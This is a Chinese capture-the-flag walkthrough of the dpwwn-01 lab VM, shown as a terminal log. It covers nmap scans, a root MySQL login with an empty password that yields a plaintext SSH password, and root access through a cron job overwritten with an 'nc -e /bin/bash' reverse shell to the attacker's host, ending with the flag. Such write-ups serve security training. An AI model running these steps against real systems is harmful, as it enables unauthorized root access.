dpwwn-01
主机发现
主机发现
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.92.0/24
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:39 EST
Nmap scan report for 192.168.92.1
Host is up (0.00015s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:E9:BE:0B (VMware)
Nmap scan report for 192.168.92.146
Host is up (0.00030s latency).
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00036s latency).
MAC Address: 00:50:56:E0:A6:00 (VMware)
Nmap scan report for 192.168.92.130
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 17.08 seconds
端口探测
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:41 EST
Nmap scan report for 192.168.92.146
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
tcp扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:42 EST
Nmap scan report for 192.168.92.146
Host is up (0.0019s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 c1:d3:be:39:42:9d:5c:b4:95:2c:5b:2e:20:59:0e:3a (RSA)
| 256 43:4a:c6:10:e7:17:7d:a0:c0:c3:76:88:1d:43:a1:8c (ECDSA)
|_ 256 0e:cc:e3:e1:f7:87:73:a1:03:47:b9:e2:cf:1c:93:15 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
3306/tcp open mysql MySQL 5.5.60-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 5
| Capabilities flags: 63487
| Some Capabilities: FoundRows, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, SupportsTransactions, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, ODBCClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, LongPassword, Support41Auth, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: (SL`"$.YV$L7j3\W"?Un
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds
udp扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:42 EST
Nmap scan report for 192.168.92.146
Host is up (0.00094s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp open|filtered msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 12.39 seconds
脚本扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:43 EST
Nmap scan report for 192.168.92.146
Host is up (0.0011s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /info.php: Possible information file
|_ /icons/: Potentially interesting folder w/ directory listing
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 36.25 seconds
3306端口
随便试了一下,发现是空密码
mysql空密码
┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo mysql -h 192.168.92.146 -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 2
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> ls
->
->
->
->
-> Ctrl-C -- exit!
Aborted
┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo mysql -h 192.168.92.146 -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases
-> ;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| ssh |
+--------------------+
4 rows in set (0.012 sec)
MariaDB [(none)]> use ssh
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [ssh]> show tables
-> ;
+---------------+
| Tables_in_ssh |
+---------------+
| users |
+---------------+
1 row in set (0.002 sec)
明文储存
MariaDB [ssh]> use users;
ERROR 1049 (42000): Unknown database 'users'
MariaDB [ssh]> select * form users;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'form users' at line 1
MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | mistic | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.008 sec)
MariaDB [ssh]> exit
Bye
ssh连接
┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo ssh mistic@192.168.92.146
The authenticity of host '192.168.92.146 (192.168.92.146)' can't be established.
ED25519 key fingerprint is SHA256:gk40nSGfkMrCYAeMyL2l9aCwV/VL5i5mWKrFfowOfH0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.146' (ED25519) to the list of known hosts.
mistic@192.168.92.146's password:
Last login: Thu Aug 1 14:41:37 2019 from 192.168.30.145
[mistic@dpwwn-01 ~]$
[mistic@dpwwn-01 ~]$ whoami
mistic
[mistic@dpwwn-01 ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:8f:3c:9f brd ff:ff:ff:ff:ff:ff
inet 192.168.92.146/24 brd 192.168.92.255 scope global noprefixroute dynamic ens33
valid_lft 1470sec preferred_lft 1470sec
inet6 fe80::20c:29ff:fe8f:3c9f/64 scope link
valid_lft forever preferred_lft forever
[mistic@dpwwn-01 ~]$ uname -a
Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686 #1 SMP Wed Nov 7 19:17:19 UTC 2018 i686 i686 i386 GNU/Linux
[mistic@dpwwn-01 ~]$ ls
logrot.sh
[mistic@dpwwn-01 ~]$ ls -laih
总用量 16K
2536099 drwx------. 2 mistic mistic 100 8月 1 2019 .
79 drwxr-xr-x. 3 root root 20 8月 1 2019 ..
2536125 -rw-------. 1 mistic mistic 0 8月 1 2019 .bash_history
2536100 -rw-r--r--. 1 mistic mistic 18 10月 30 2018 .bash_logout
2536101 -rw-r--r--. 1 mistic mistic 193 10月 30 2018 .bash_profile
2536102 -rw-r--r--. 1 mistic mistic 231 10月 30 2018 .bashrc
2536126 -rwx------. 1 mistic mistic 186 8月 1 2019 logrot.sh
[mistic@dpwwn-01 ~]$ cat .bash_history
[mistic@dpwwn-01 ~]$ cat logrot.sh
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"
while : ; do
read line
while [[ -f $SEMAPHORE ]]; do
sleep 1s
done
printf "%s\n" "$line" >> $LOGFILE
done
crontab提权
crontab提权
[[crontab⽂件权限提权]]
[mistic@dpwwn-01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/3 * * * * root /home/mistic/logrot.sh
[mistic@dpwwn-01 ~]$ vi logrot.sh
[mistic@dpwwn-01 ~]$ cat logrot.sh
nc -e /bin/bash 192.168.92.130 1234
#!/bin/bash
[mistic@dpwwn-01 ~]$
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234
[sudo] kali 的密码:
listening on [any] 1234 ...
connect to [192.168.92.130] from (UNKNOWN) [192.168.92.146] 49408
ls
anaconda-ks.cfg
dpwwn-01-FLAG.txt
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:8f:3c:9f brd ff:ff:ff:ff:ff:ff
inet 192.168.92.146/24 brd 192.168.92.255 scope global noprefixroute dynamic ens33
valid_lft 1119sec preferred_lft 1119sec
inet6 fe80::20c:29ff:fe8f:3c9f/64 scope link
valid_lft forever preferred_lft forever
cat dpwwn-01-FLAG.txt
Congratulation! I knew you can pwn it as this very easy challenge.
Thank you.
64445777
6e643634
37303737
37373665
36347077
776e6450
4077246e
33373336
36359090
搞定收工
浙公网安备 33010602011771号